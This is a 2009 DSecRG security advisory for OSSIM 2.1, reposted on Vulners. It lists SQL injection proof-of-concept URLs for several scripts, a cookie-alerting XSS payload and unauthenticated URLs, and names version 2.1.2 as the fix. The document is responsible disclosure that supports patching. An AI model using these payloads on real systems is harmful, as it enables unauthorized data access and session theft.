Vulners
Lucene search
OSSIM 2.1 - SQL Injection and xss
OSSIM - Open Source Security Information Management is vulnerable to multiple security vulnerabilities.
1. SQL Injections
2. Linked XSS
3. Unauthorized access
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-055
Application: OSSIM
Versions Affected: 2.1 and may be 2.1.1
Vendor URL: http://ossim.net/
Bug: SQL Injection,XSS, Unauthorized access
Exploits: YES
Reported: 07.09.2009
Vendor response: 09.09.2009
Solution: YES (version 2.1.2)
Date of Public Advisory:21.09.2009
Author: Sintsov Alexey of Digital Security Research Group [DSecRG]
Details
*******
1.1 SQL injections in repository
Attacker need to be authorized in system for success.
Vulnerable script - repository_document.php
Vulnerable parameter - id_document
Example
*******
http://OSSIM-SERVER/ossim/repository/repository_document.php?id_document=-3
union select 1,2,user(),4,5,6--&maximized=1&search_bylink=&pag=1
1.2 SQL injections in repository
Attacker need to be authorized in system for success.
Vulnerable script - repository_links.php
Vulnerable parameter - id_document
Example
*******
http://OSSIM-SERVER/ossim/repository/repository_links.php?id_document=-3
union select 1,user(),3,4,5,6
1.3 SQL injections in repository
Attacker need to be authorized in system for success.
Vulnerable script - repository_editdocument.php
Vulnerable parameter - id_document
Example
*******
http://OSSIM-SERVER/ossim/repository/repository_editdocument.php?id_document=-3
union select 1,user(),3,4,5,6
1.4 SQL injection in policy scripts
Attacker need to be authorized in system for success.
Vulnerable script - getpolicy.php
Vulnerable parameter - group
Example
*******
http://OSSIM-SERVER/ossim/policy/getpolicy.php?group=0 and 1=1
1.5 SQL injection in policy scripts
Attacker need to be authorized in system for success.
Vulnerable script - newhostgroupform.php
Vulnerable parameter - name
Example
*******
http://OSSIM-SERVER/ossim/host/newhostgroupform.php?name=' union select
user(),'b','c','d','f
1.6 SQL injection in policy scripts
Attacker need to be authorized in system for success.
Vulnerable script - modifynetform.php
Vulnerable parameter - name
Example
*******
http://OSSIM-SERVER/ossim/net/modifynetform.php?name=' union select
user(),'b','c','d','e','f','g','h','a
And others scripts in policy menu.
2. Linked XSS in main menu
Vulnerable script /ossim/
Vulnerable parameter - option
Example
*******
http://OSSIM-SERVER/ossim/?option=0" onload=alert(document.cookie) a="
3. Access to data without authentication.
Unauthorized user can see graphs and infrastructure
Example
*******
Access to the graph:
http://OSSIM-SERVER/ossim/graphs/alarms_events.php
Internal infrastructure view:
http://OSSIM-SERVER/ossim/host/draw_tree.php
Fix Information
***************
Upgrade to version 2.1.2
About
*****
Digital Security is one of the leading IT security companies in CEMEA, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.
Contact: research [at] dsecrg [dot] com
http://www.dsecrg.com
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1